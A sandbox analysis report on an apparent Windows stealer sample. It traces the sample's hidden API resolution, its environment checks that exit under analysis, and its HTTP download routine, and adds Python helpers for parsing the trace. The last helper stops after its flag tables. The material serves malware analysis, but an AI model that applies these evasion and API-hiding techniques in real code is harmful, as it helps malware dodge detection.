4f546b lstrcpy 26885->26887 26888 4f547a InternetReadFile 26886->26888 26887->26886 26888->26881 26888->26885 26890 508cc6 ExitProcess 26889->26890 26891 508ccd 26889->26891 26892 508ee2 26891->26892 26893 508d30 lstrlen 26891->26893 26894 508e56 StrCmpCA 26891->26894 26895 508d5a lstrlen 26891->26895 26896 508dbd StrCmpCA 26891->26896 26897 508ddd StrCmpCA 26891->26897 26898 508dfd StrCmpCA 26891->26898 26899 508e1d StrCmpCA 26891->26899 26900 508e3d StrCmpCA 26891->26900 26901 508d84 StrCmpCA 26891->26901 26902 508da4 StrCmpCA 26891->26902 26903 508d06 lstrlen 26891->26903 26904 508e88 lstrlen 26891->26904 26905 508e6f StrCmpCA 26891->26905 26906 508ebb lstrcpy 26891->26906 26892->25780 26893->26891 26894->26891 26895->26891 26896->26891 26897->26891 26898->26891 26899->26891 26900->26891 26901->26891 26902->26891 26903->26891 26904->26891 26905->26891 26906->26891 26907->25786 26908->25788 26909->25794 
26910->25796 26911->25802 26912->25804 26913->25810 26914->25814 26915->25820 26916->25822 26917->25826 26918->25840 26919->25844 26920->25843 26921->25839 26922->25843 26923->25859 26924->25846 26925->25848 26926->25853 26927->25856 26928->25861 26929->25863 26930->25870 26931->25876 26932->25897 26933->25901 26934->25899 26935->25896 26936->25899 26937->25910 26940 4f161f 26939->26940 26941 4f1633 26940->26941 26942 4f162b lstrcpy 26940->26942 26943 4f164d lstrcpy 26941->26943 26944 4f1655 26941->26944 26942->26941 26943->26944 26945 4f166f lstrcpy 26944->26945 26946 4f1677 26944->26946 26945->26946 26947 4f1699 26946->26947 26948 4f1691 lstrcpy 26946->26948 26947->26632 26948->26947 26950 5171e6 26949->26950 26951 512860 26950->26951 26952 5171fc lstrcpy 26950->26952 26951->25775 26952->26951 26954 4f4bd0 26953->26954 26954->26954 26955 4f4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26954->26955 26956 4f4c41 26955->26956 26956->26740 26958 513e83 26957->26958 26959 513e9f lstrcpy 26958->26959 26960 513eab 26958->26960 26959->26960 26961 513ed5 GetSystemTime 26960->26961 26962 513ecd lstrcpy 26960->26962 26963 513ef3 26961->26963 26962->26961 26963->26759 26965 51732d 26964->26965 26966 4f519b 26965->26966 26967 51733d lstrcpy lstrcat 26965->26967 26968 517280 26966->26968 26967->26966 26970 51728c 26968->26970 26969 5172b4 26969->26815 26970->26969 26971 5172ac lstrcpy 26970->26971 26971->26969 26974 5172dc 26972->26974 26973 4f51b7 26973->26818 26974->26973 26975 5172ed lstrcpy lstrcat 26974->26975 26975->26973 27006 5131f0 GetSystemInfo wsprintfA 26981 4f5869 57 API calls 26982 504c77 295 API calls 27013 50f2f8 93 API calls 26990 50e0f9 140 API calls 27017 506b79 138 API calls 27002 512d60 11 API calls 27018 512b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 26984 4f8c79 strcpy_s 27019 4f1b64 162 API calls 27033 4fbbf9 90 API calls 27008 501269 408 API calls 27021 519711 128 API calls __setmbcp 26985 512c10 GetProcessHeap 
RtlAllocateHeap GetTimeZoneInformation wsprintfA 27003 514e35 8 API calls 27022 4fb309 98 API calls 26986 518819 free free free _raise 26991 502499 290 API calls 27034 508615 47 API calls 27023 4f7702 free ctype 26993 51749e 5 API calls ctype 26994 512880 10 API calls 26995 514480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 26996 513480 6 API calls 27014 513280 7 API calls 27035 4fdb99 672 API calls 26997 508c88 16 API calls 27004 513130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27036 50abb2 120 API calls 27010 4f8e20 strcpy_s free std::exception::exception 26998 5130a0 GetSystemPowerStatus 27007 5129a0 GetCurrentProcess IsWow64Process 27011 4ff639 144 API calls 27015 4f16b9 200 API calls 27027 4fbf39 177 API calls 27028 504b29 303 API calls 27037 5023a9 298 API calls
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F4C7F
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4CD2
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4D05
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4D35
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4D73
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4DA6
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004F4DB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 86d6c8b98e81aa257cb9fb8af1d2c655b65bcc32d20c138cf547b23ee20a3769
                        • Instruction ID: b2271363f88f0ad75d39df165a291ae59f429dd64bdaf17853770d555f7835ef
                        • Opcode Fuzzy Hash: 86d6c8b98e81aa257cb9fb8af1d2c655b65bcc32d20c138cf547b23ee20a3769
                        • Instruction Fuzzy Hash: 92528231A0121E9BDB21EFA5DC49BBF7BB9AF44304F054029FA05E7251DB78DD428B98

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2125 516390-5163bd GetPEB 2126 5165c3-516623 LoadLibraryA * 5 2125->2126 2127 5163c3-5165be call 5162f0 GetProcAddress * 20 2125->2127 2129 516625-516633 GetProcAddress 2126->2129 2130 516638-51663f 2126->2130 2127->2126 2129->2130 2132 516641-516667 GetProcAddress * 2 2130->2132 2133 51666c-516673 2130->2133 2132->2133 2134 516675-516683 GetProcAddress 2133->2134 2135 516688-51668f 2133->2135 2134->2135 2137 516691-51669f GetProcAddress 2135->2137 2138 5166a4-5166ab 2135->2138 2137->2138 2139 5166d7-5166da 2138->2139 2140 5166ad-5166d2 GetProcAddress * 2 2138->2140 2140->2139
                        APIs
                        • GetProcAddress.KERNEL32(75550000,01030708), ref: 005163E9
                        • GetProcAddress.KERNEL32(75550000,01030690), ref: 00516402
                        • GetProcAddress.KERNEL32(75550000,01030840), ref: 0051641A
                        • GetProcAddress.KERNEL32(75550000,01030660), ref: 00516432
                        • GetProcAddress.KERNEL32(75550000,01038810), ref: 0051644B
                        • GetProcAddress.KERNEL32(75550000,01026580), ref: 00516463
                        • GetProcAddress.KERNEL32(75550000,01026420), ref: 0051647B
                        • GetProcAddress.KERNEL32(75550000,01030558), ref: 00516494
                        • GetProcAddress.KERNEL32(75550000,01030570), ref: 005164AC
                        • GetProcAddress.KERNEL32(75550000,01030588), ref: 005164C4
                        • GetProcAddress.KERNEL32(75550000,010305B8), ref: 005164DD
                        • GetProcAddress.KERNEL32(75550000,01026280), ref: 005164F5
                        • GetProcAddress.KERNEL32(75550000,010305E8), ref: 0051650D
                        • GetProcAddress.KERNEL32(75550000,01030618), ref: 00516526
                        • GetProcAddress.KERNEL32(75550000,010264A0), ref: 0051653E
                        • GetProcAddress.KERNEL32(75550000,01030630), ref: 00516556
                        • GetProcAddress.KERNEL32(75550000,01030858), ref: 0051656F
                        • GetProcAddress.KERNEL32(75550000,010264C0), ref: 00516587
                        • GetProcAddress.KERNEL32(75550000,01030870), ref: 0051659F
                        • GetProcAddress.KERNEL32(75550000,010264E0), ref: 005165B8
                        • LoadLibraryA.KERNEL32(01030918,?,?,?,00511C03), ref: 005165C9
                        • LoadLibraryA.KERNEL32(01030888,?,?,?,00511C03), ref: 005165DB
                        • LoadLibraryA.KERNEL32(010308B8,?,?,?,00511C03), ref: 005165ED
                        • LoadLibraryA.KERNEL32(010308A0,?,?,?,00511C03), ref: 005165FE
                        • LoadLibraryA.KERNEL32(010308D0,?,?,?,00511C03), ref: 00516610
                        • GetProcAddress.KERNEL32(75670000,010308E8), ref: 0051662D
                        • GetProcAddress.KERNEL32(75750000,01030900), ref: 00516649
                        • GetProcAddress.KERNEL32(75750000,01038E50), ref: 00516661
                        • GetProcAddress.KERNEL32(76BE0000,01038C40), ref: 0051667D
                        • GetProcAddress.KERNEL32(759D0000,01026480), ref: 00516699
                        • GetProcAddress.KERNEL32(773F0000,01038900), ref: 005166B5
                        • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 005166CC
                        Strings
                        • NtQueryInformationProcess, xrefs: 005166C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: the same sixteen dump regions listed under the first function above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: cb17645e38ebf906b287cbfb2e50d6439085d373b62de1ca53052657e1e5e1bb
                        • Instruction ID: 765376233dabe90bb4537a5af6250b54a254b97b523f3dbb81ef0ccfc0e375a4
                        • Opcode Fuzzy Hash: cb17645e38ebf906b287cbfb2e50d6439085d373b62de1ca53052657e1e5e1bb
                        • Instruction Fuzzy Hash: 8CA196B491224ADFD7B4DF64ED48E2637B9F748200B08C519EA55D3364EB3DA802CB69

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2141 511bf0-511c0b call 4f2a90 call 516390 2146 511c1a-511c27 call 4f2930 2141->2146 2147 511c0d 2141->2147 2151 511c35-511c63 2146->2151 2152 511c29-511c2f lstrcpy 2146->2152 2149 511c10-511c18 2147->2149 2149->2146 2149->2149 2156 511c65-511c67 ExitProcess 2151->2156 2157 511c6d-511c7b GetSystemInfo 2151->2157 2152->2151 2158 511c85-511ca0 call 4f1030 call 4f10c0 GetUserDefaultLangID 2157->2158 2159 511c7d-511c7f ExitProcess 2157->2159 2164 511ca2-511ca9 2158->2164 2165 511cb8-511cca call 512ad0 call 513e10 2158->2165 2164->2165 2166 511cb0-511cb2 ExitProcess 2164->2166 2171 511ce7-511d06 lstrlen call 4f2930 2165->2171 2172 511ccc-511cde call 512a40 call 513e10 2165->2172 2177 511d23-511d40 lstrlen call 4f2930 2171->2177 2178 511d08-511d0d 2171->2178 2172->2171 2185 511ce0-511ce1 ExitProcess 2172->2185 2186 511d42-511d44 2177->2186 2187 511d5a-511d7b call 512ad0 lstrlen call 4f2930 2177->2187 2178->2177 2180 511d0f-511d11 2178->2180 2180->2177 2183 511d13-511d1d lstrcpy lstrcat 2180->2183 2183->2177 2186->2187 2188 511d46-511d54 lstrcpy lstrcat 2186->2188 2193 511d9a-511db4 lstrlen call 4f2930 2187->2193 2194 511d7d-511d7f 2187->2194 2188->2187 2199 511db6-511db8 2193->2199 2200 511dce-511deb call 512a40 lstrlen call 4f2930 2193->2200 2194->2193 2195 511d81-511d85 2194->2195 2195->2193 2197 511d87-511d94 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2201 511dba-511dc8 lstrcpy lstrcat 2199->2201 2206 511e0a-511e0f 2200->2206 2207 511ded-511def 2200->2207 2201->2200 2208 511e11 call 4f2a20 2206->2208 2209 511e16-511e22 call 4f2930 2206->2209 2207->2206 2210 511df1-511df5 2207->2210 2208->2209 2215 511e30-511e66 call 4f2a20 * 5 OpenEventA 2209->2215 2216 511e24-511e26 2209->2216 2210->2206 2213 511df7-511e04 lstrcpy lstrcat 2210->2213 2213->2206 2228 511e68-511e8a CloseHandle Sleep OpenEventA 2215->2228 2229 511e8c-511ea0 CreateEventA call 511b20 call 50ffd0 2215->2229 2216->2215 2217 511e28-511e2a lstrcpy 2216->2217 
2217->2215 2228->2228 2228->2229 2233 511ea5-511eae CloseHandle ExitProcess 2229->2233
                        APIs
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030708), ref: 005163E9
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030690), ref: 00516402
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030840), ref: 0051641A
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030660), ref: 00516432
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01038810), ref: 0051644B
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01026580), ref: 00516463
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01026420), ref: 0051647B
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030558), ref: 00516494
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030570), ref: 005164AC
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030588), ref: 005164C4
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,010305B8), ref: 005164DD
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01026280), ref: 005164F5
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,010305E8), ref: 0051650D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00511C2F
                        • ExitProcess.KERNEL32 ref: 00511C67
                        • GetSystemInfo.KERNEL32(?), ref: 00511C71
                        • ExitProcess.KERNEL32 ref: 00511C7F
                          • Part of subcall function 004F1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F1046
                          • Part of subcall function 004F1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 004F104D
                          • Part of subcall function 004F1030: ExitProcess.KERNEL32 ref: 004F1058
                          • Part of subcall function 004F10C0: GlobalMemoryStatusEx.KERNEL32 ref: 004F10EA
                          • Part of subcall function 004F10C0: ExitProcess.KERNEL32 ref: 004F1114
                        • GetUserDefaultLangID.KERNEL32 ref: 00511C8F
                        • ExitProcess.KERNEL32 ref: 00511CB2
                        • ExitProcess.KERNEL32 ref: 00511CE1
                        • lstrlen.KERNEL32(01038820), ref: 00511CEE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00511D15
                        • lstrcat.KERNEL32(00000000,01038820), ref: 00511D1D
                        • lstrlen.KERNEL32(00524B98), ref: 00511D28
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511D48
                        • lstrcat.KERNEL32(00000000,00524B98), ref: 00511D54
                        • lstrlen.KERNEL32(00000000), ref: 00511D63
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511D89
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511D94
                        • lstrlen.KERNEL32(00524B98), ref: 00511D9F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511DBC
                        • lstrcat.KERNEL32(00000000,00524B98), ref: 00511DC8
                        • lstrlen.KERNEL32(00000000), ref: 00511DD7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511DF9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511E04
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: the same sixteen dump regions listed under the first function above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                        • String ID:
                        • API String ID: 3366406952-0
                        • Opcode ID: fabe6fbb2ed9b79a78032003cb9140563b5acc01a4d798f03e3992cf2108d01f
                        • Instruction ID: b50febbd53b5f32ef8d723f77d323a44f8181ead5f2df1d9fb8e8f1aea3f93c4
                        • Opcode Fuzzy Hash: fabe6fbb2ed9b79a78032003cb9140563b5acc01a4d798f03e3992cf2108d01f
                        • Instruction Fuzzy Hash: 0A71B23160161A9BEB30ABB1DD4DBAE3F79BF40705F088054F706961A1DF789C428B6D
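Two of the records above describe behaviour an analyst normally wants to confirm mechanically rather than by eye: function 00516390 reads the PEB, resolves twenty exports with GetProcAddress against a single module base (75550000), loads five further libraries with LoadLibraryA and finally resolves NtQueryInformationProcess by name; function 00511BF0 calls GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx and GetUserDefaultLangID, each immediately followed by ExitProcess. The Python script below is an added example, not part of the Joe Sandbox report and not code from the sample. It parses lines in the shape of the report's "APIs" lists (the embedded SAMPLE_TRACE is a hand-copied subset of the lines above), groups GetProcAddress calls by the module base passed as first argument, and lists every environment check that is directly followed by ExitProcess. The ENV_CHECKS labels only say what each API reports; the thresholds the sample applies are not visible in the trace, and the module base values are those of this analysis run.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed sample: a subset of the "APIs" lines from the report records above,
# copied by hand (not the full trace).
SAMPLE_TRACE = """
  • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030708), ref: 005163E9
  • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030690), ref: 00516402
  • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01038810), ref: 0051644B
  • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00511C2F
  • ExitProcess.KERNEL32 ref: 00511C67
  • GetSystemInfo.KERNEL32(?), ref: 00511C71
  • ExitProcess.KERNEL32 ref: 00511C7F
  • Part of subcall function 004F1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F1046
  • Part of subcall function 004F1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 004F104D
  • Part of subcall function 004F1030: ExitProcess.KERNEL32 ref: 004F1058
  • Part of subcall function 004F10C0: GlobalMemoryStatusEx.KERNEL32 ref: 004F10EA
  • Part of subcall function 004F10C0: ExitProcess.KERNEL32 ref: 004F1114
  • GetUserDefaultLangID.KERNEL32 ref: 00511C8F
  • ExitProcess.KERNEL32 ref: 00511CB2
  • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 005166CC
"""

# One report line: optional "Part of subcall function X:" prefix, API.MODULE,
# optional argument list in parentheses, then "ref: <address>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # an argument the report left as a raw DWORD


class ApiCall(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                 # address of the call site
    subcall: Optional[int]   # function the line was attributed to, if any


def parse_trace(text: str) -> List[ApiCall]:
    """Turn report 'APIs' lines into ApiCall records, keeping the listed order."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def resolver_summary(calls: List[ApiCall]) -> Dict[int, dict]:
    """Group GetProcAddress calls by the module base in their first argument.

    A second argument that is not an 8-digit hex DWORD is an export name the
    sandbox could render; a raw pointer means the name was not shown.
    """
    summary: Dict[int, dict] = {}
    for c in calls:
        if c.api != "GetProcAddress" or len(c.args) < 2 or not HEX32_RE.match(c.args[0]):
            continue
        entry = summary.setdefault(int(c.args[0], 16), {"count": 0, "named": []})
        entry["count"] += 1
        if not HEX32_RE.match(c.args[1]):
            entry["named"].append(c.args[1])
    return summary


# APIs that precede ExitProcess in the 00511BF0 record; the label is what the
# API reports, not the condition the sample tests (that is not in the trace).
ENV_CHECKS = {
    "GetSystemInfo": "processor count / architecture",
    "GlobalMemoryStatusEx": "physical memory size",
    "VirtualAllocExNuma": "NUMA-aware allocation result",
    "GetUserDefaultLangID": "user default language identifier",
}


def exit_guards(calls: List[ApiCall]) -> List[Tuple[str, str, int]]:
    """(api, what it reports, ExitProcess call site) for every environment
    check that is immediately followed by ExitProcess."""
    hits = []
    for prev, cur in zip(calls, calls[1:]):
        if cur.api == "ExitProcess" and prev.api in ENV_CHECKS:
            hits.append((prev.api, ENV_CHECKS[prev.api], cur.ref))
    return hits


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for base, info in resolver_summary(calls).items():
        print(f"GetProcAddress x{info['count']} against base {base:#010x}, named: {info['named']}")
    for api, what, ref in exit_guards(calls):
        print(f"{api} ({what}) -> ExitProcess at {ref:#010x}")
```

Run it over the full "APIs" lists copied from the report. Pointer-only second arguments such as 01030708 are resolutions whose export name the report did not render; only the last one, NtQueryInformationProcess, appears as a string, which is why the resolver summary reports one named export and nineteen unnamed ones for that record.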

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2234 4f6c40-4f6c64 call 4f2930 2237 4f6c66-4f6c6b 2234->2237 2238 4f6c75-4f6c97 call 4f4bc0 2234->2238 2237->2238 2239 4f6c6d-4f6c6f lstrcpy 2237->2239 2242 4f6caa-4f6cba call 4f2930 2238->2242 2243 4f6c99 2238->2243 2239->2238 2247 4f6cbc-4f6cc2 lstrcpy 2242->2247 2248 4f6cc8-4f6cf5 InternetOpenA StrCmpCA 2242->2248 2244 4f6ca0-4f6ca8 2243->2244 2244->2242 2244->2244 2247->2248 2249 4f6cfa-4f6cfc 2248->2249 2250 4f6cf7 2248->2250 2251 4f6ea8-4f6ebb call 4f2930 2249->2251 2252 4f6d02-4f6d22 InternetConnectA 2249->2252 2250->2249 2261 4f6ebd-4f6ebf 2251->2261 2262 4f6ec9-4f6ee0 call 4f2a20 * 2 2251->2262 2253 4f6d28-4f6d5d HttpOpenRequestA 2252->2253 2254 4f6ea1-4f6ea2 InternetCloseHandle 2252->2254 2256 4f6e94-4f6e9e InternetCloseHandle 2253->2256 2257 4f6d63-4f6d65 2253->2257 2254->2251 2256->2254 2259 4f6d7d-4f6dad HttpSendRequestA HttpQueryInfoA 2257->2259 2260 4f6d67-4f6d77 InternetSetOptionA 2257->2260 2263 4f6daf-4f6dd3 call 5171e0 call 4f2a20 * 2 2259->2263 2264 4f6dd4-4f6de4 call 513d90 2259->2264 2260->2259 2261->2262 2265 4f6ec1-4f6ec3 lstrcpy 2261->2265 2264->2263 2273 4f6de6-4f6de8 2264->2273 2265->2262 2276 4f6dee-4f6e07 InternetReadFile 2273->2276 2277 4f6e8d-4f6e8e InternetCloseHandle 2273->2277 2276->2277 2279 4f6e0d 2276->2279 2277->2256 2281 4f6e10-4f6e15 2279->2281 2281->2277 2283 4f6e17-4f6e3d call 517310 2281->2283 2286 4f6e3f call 4f2a20 2283->2286 2287 4f6e44-4f6e51 call 4f2930 2283->2287 2286->2287 2291 4f6e53-4f6e57 2287->2291 2292 4f6e61-4f6e8b call 4f2a20 InternetReadFile 2287->2292 2291->2292 2294 4f6e59-4f6e5b lstrcpy 2291->2294 2292->2277 2292->2281 2294->2292
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F6C6F
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F6CC2
                        • InternetOpenA.WININET(0051CFEC,00000001,00000000,00000000,00000000), ref: 004F6CD5
                        • StrCmpCA.SHLWAPI(?,0103E358), ref: 004F6CED
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F6D15
                        • HttpOpenRequestA.WININET(00000000,GET,?,0103DB28,00000000,00000000,-00400100,00000000), ref: 004F6D50
                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004F6D77
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004F6D86
                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004F6DA5
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004F6DFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F6E5B
                        • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 004F6E7D
                        • InternetCloseHandle.WININET(00000000), ref: 004F6E8E
                        • InternetCloseHandle.WININET(?), ref: 004F6E98
                        • InternetCloseHandle.WININET(00000000), ref: 004F6EA2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F6EC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: the same sixteen dump regions listed under the first function above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                        • String ID: ERROR$GET
                        • API String ID: 3687753495-3591763792
                        • Opcode ID: e6bba5d555b37ebf01f42f736b64c75993f05588dcd2d353802d95e5f4a686b8
                        • Instruction ID: b41676892ea4f59a0636b6ae05b96c64ccf8e91380d8b60abd306da1832cbc9f
                        • Opcode Fuzzy Hash: e6bba5d555b37ebf01f42f736b64c75993f05588dcd2d353802d95e5f4a686b8
                        • Instruction Fuzzy Hash: C481A472A41219ABEB20DFA5DC45FBF77B8EF44700F054119FA05E7280DB78AD458B98
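The record above is a complete WinINet exchange: InternetOpenA, InternetConnectA, HttpOpenRequestA with verb GET, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA and a loop of InternetReadFile calls. The report leaves the scalar arguments numeric, so the meaning of the call has to be recovered from wininet.h. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample. It assumes the report's convention of printing 32-bit arguments as signed hex, so the HttpOpenRequestA flags value -00400100 is read as the DWORD 0xFFBFFF00; it folds such values back into unsigned form, splits dwFlags into INTERNET_FLAG_* names plus any residual bits, and names the other scalar arguments (open type, service, option id, query level, read chunk size). The SESSION list is constructed from the argument lists in the record, with '?' where the report could not render a value. The decoder reports what the bits mean; whether the malware intends every one of them is not recoverable from the trace, and the 4-byte buffer passed to InternetSetOptionA at 00010300 is not shown either.

```python
from typing import Dict, List, Tuple

# dwFlags bits for HttpOpenRequestA / InternetOpenUrlA, from wininet.h.
INTERNET_FLAGS: Dict[int, str] = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x40000000: "INTERNET_FLAG_RAW_DATA",
    0x20000000: "INTERNET_FLAG_EXISTING_CONNECT",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x08000000: "INTERNET_FLAG_PASSIVE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x02000000: "INTERNET_FLAG_MAKE_PERSISTENT",
    0x01000000: "INTERNET_FLAG_FROM_CACHE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00100000: "INTERNET_FLAG_READ_PREFETCH",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00020000: "INTERNET_FLAG_RESTRICTED_ZONE",
    0x00010000: "INTERNET_FLAG_CACHE_IF_NET_FAIL",
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000800: "INTERNET_FLAG_RESYNCHRONIZE",
    0x00000400: "INTERNET_FLAG_HYPERLINK",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# Scalar argument values seen in the record above, also from wininet.h.
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
OPTIONS = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
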